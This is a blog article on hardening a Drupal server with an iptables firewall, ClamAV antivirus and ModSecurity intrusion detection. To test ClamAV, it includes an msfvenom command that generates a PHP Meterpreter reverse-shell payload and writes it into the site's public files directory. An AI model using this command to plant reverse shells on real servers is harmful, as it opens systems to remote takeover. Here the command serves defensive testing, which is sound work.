NWDUG 2018 Sponsor
DrupalCamp Spain 2016 Sponsor
European Commission
United Nations
Hammersmith & Fulham
Code Enigma
The Open University

Improving Drupal security with external tools

security cameras mounted on a wall

One of the most important but often overlooked requirements of any web development project is security: ensuring that network, server and application are configured and maintained in a sane, safe, controlled, and auditable way is crucial.

Non-functional requirements such as security, accessibility, performance and reliability are often taken for granted: clients tend to assume their web applications will be secure by default - surely the professional development team will also know what they’re doing when it comes to securing the whole thing, right?

Well, not always. Web projects can get pretty complex these days:

Javascript based front-end frameworks not only add a new level of mobile responsiveness and rich features, but an additional layer of code to secure as well.

Server side frameworks such as Django, Drupal and Symfony need to be secured against various attack vectors such as malicious user input, brute force password cracking, session hijacking and cross-site request forgeries.

Many cloud based hosting solutions are made up of individual services (scalable storage, distributed databases, in-memory caching, load balancers, etc) that each have their own specific attack surface.

As the number of moving parts in web projects grow, it becomes increasingly important for a team to define and maintain good security practices, and to spend as much time on the 'invisible' aspect of securing the back-end code as we do on making the front-end pretty across all browsers and devices.

One of the most relevant best practices is security in depth, which means add security controls in each application layer, like an onion. In this article we will focus on the system layer and highlight how a firewall, antivirus suite and Intrusion Detection System can help secure your system.

We are assuming you are working on a LAMP stack, but if you're not, the tools we discuss exist for Windows and OS X as well.

1. Firewall: Iptables

The first tool on the list is iptables, a powerful firewall available on every GNU/Linux system. It works by intercepting and manipulating network packets in different states of processing, at userspace level.

The core concepts of iptables are: rules, chains and tables.

A ** rule** is a piece of code that evaluates if a network packet matches some condition and, defines an action to be performed on that packet. The most common actions are:

  • ACCEPT: accept the packet
  • DROP: discard the packet
  • QUEUE: send the packet to a userspace queue
  • RETURN: stop evaluating the packet in the current evaluation chain

A chain is a set of sorted rules. Packets are evaluated by all the rules in a chain, in the specified order. If the packet matches a rule, the rule is executed. If it doesn't, it is passed to the next rule for the next evaluation.

To keep chains manageable, multiple chains that perform similar or related processing are often grouped together in tables.

For more information, have a a look at the iptables man page.

Let's say we want to:

  • accept connections on port 80 (http traffic)and 443 (https traffic) from anywhere
  • accept connections on port 22 (ssh traffic) from a specific IP address
  • deny all other incoming connections.
  • prevent our server from initiating outgoing connections - a security best practice to stop attackers from proxying through our server should it become compromised.

First we specify the default behaviour of DROPping all outgoing connections; then we selectively allow some traffic to go out, namely established connections - connections that are responses to valid incoming requests.

Here are the rules we need:

# First delete any rules previously set.
$ iptables --flush

# Set the default policy for chains to DROP
$ iptables -P INPUT DROP
$ iptables -A OUTPUT -j DROP
$ iptables -A FORWARD -j DROP

# Accept incoming TCP connections on ports 80 and 443
$ iptables -A INPUT -p tcp --dport 80 -j ACCEPT
$ iptables -A INPUT -p tcp --dport 443 -j ACCEPT

# Allow incoming SSH connections from specific IP address
$ iptables -A INPUT -p tcp --dport ssh -j ACCEPT -s your.ip.comes.here

# Allow responses to SSH, HTTP and HTTPS traffic
$ iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
$ iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
$ iptables -A OUTPUT -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT

To ensure your firewall setup survives after a system reboot, add the rules to your /etc/rc.local file, the last script that is executed when your system boots.

2. Antivirus: ClamAV

ClamAV is the most extensive antivirus suite for GNU/Linux systems.

In the context of our Drupal site installation we want to make sure no malware gets uploaded to the Drupal public files directory. You don't want to risk having a web shell here, or any other script that could infect your users.

Antivirus software analyses files in binary mode and looks for patterns of known malicious code that could lead to a vulnerability exploitation. These patterns are called fingerprints, and are sometimes referred to as virus definitions as well.

To demonstrate ClamAV's efficiency and ease of use, let's perform a quick test.

Step 1: Create an evil PHP shell with msfvenom

$ cd /var/www/drupal/sites/default/files
$ msfvenom -p php/meterpreter\_reverse\_tcp LHOST= LPORT=4444 -f raw > shell.php

Step 2: Recursively scan out Drupal public files directory and hope clamsav detects our evil shell.

$ clamscan -i -r /var/www/drupal/sites/default/files
/var/www/drupal/sites/default/files/shell.php: Php.Trojan.MSShellcode-4 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 4297614
Engine version: 0.98.7
Scanned directories: 51
Scanned files: 557
Infected files: 1
Data scanned: 36.04 MB
Data read: 24.13 MB (ratio 1.49:1)
Time: 18.334 sec (0 m 18 s)


ClamAV can be used both as a system daemon and as a command line tool to scan a file or a directory recursively. It's easy to install and available on most GNU/Linux distributions through the package manager. Example installation on debian:

$ apt-get install clamav clamav-freshclam clamav-daemon

Note: updates are performed automatically by the clamav-freshclam daemon.

Once installed, we want ClamAV to periodically scan our user files directory. To do so, add the following line to be executed by cron.

# Scan the Drupal sites folder with clamav every hour
00 01 * * * clamscan -i -r /path/to/drupal/sites/default/files/ >> /var/log/clamav.log

Careful! This will list the infected files but won't actually remove them. Take a look to clamscan options so you can configure advanced setups.

3. Intrusion detection with Mod Security

The last tool for today is Mod Security, a web-specific Intrusion Detection System, or IDS, which works like an antivirus for HTTP requests.

Mod Security was born as an OWASP project, and it’s easily integrated with Apache, IIS and Nginx as a module. The module itself is a rule engine, running lots of predefined checks against each HTTP request received by the web server. It tries to identify known attack patterns such as SQL injection and Cross Site Scripting.

Example installation on Debian:

$ apt-get install libapache2-mod-security
$ a2enmod mod-security
$ /etc/init.d/apache2 force-reload

To integrate Mod Security with Nginx, you will need to compile the module from source, and then re-compile your Nginx from source too, as Nginx doesn't yet support dynamic module loading.

Once installed and enabled, we need to download an up-to-date ruleset, and restart the web server. At this point, there’s both good and bad news.

Bad news: the best rulesets are only available through a paid service, but they do come with almost daily updates.

Good news: some good rulesets such as the ones provided by SpiderLabs are available for free, though they're often a few months behind the commercial rule sets.

After installing and configuring Mod Security, your web server will return an error response - 403 Forbidden. This is the default behaviour when the rule engine detects a potential attack on a request that matches a pattern defined in a certain rule.

It’s very important to check the Mod Security logs, especially after first enabling Mod Security, to locate and fix possible false positives that may be blocking legitimate requests.

4. Conclusion

Security is only as strong as its weakest link. Many of the best security tools are free and open source software, available to everyone. Combining iptables firewall rules with CLAMAV antivirus rules and Mod Security intrusion detection rules will help build a strong and secure foundation for your whole web stack.

Enjoy your reduced stress levels and better night rest, and look out for our next article in this series on web security.

Photo of security cameras by Scott Webb.

Zequi VazquezSenior Developer
Upcoming workshops

No public workshops scheduled at the moment.

Want us to organise one in your city? Get in touch.

Past workshops

Drupal 8 Core Concepts
17 DEC 2018 - London (1 day)
Registration closed

Drupal 8 for Content Editors
18 + 19 DEC 2018 - London (2 days)
Registration closed

Drupal 8 for Site Builders
20 + 21 DEC 2018 - London (2 days)
Registration closed

Drupal 8 for Site Builders
OCT 2017 - Malaga (2 days)
Registration closed

Drupal 8 Module Development
OCT 2017 - Malaga (2 days)
Registration closed

Drupal 8 Theme Development
OCT 2017 - Malaga (1 day)
Registration closed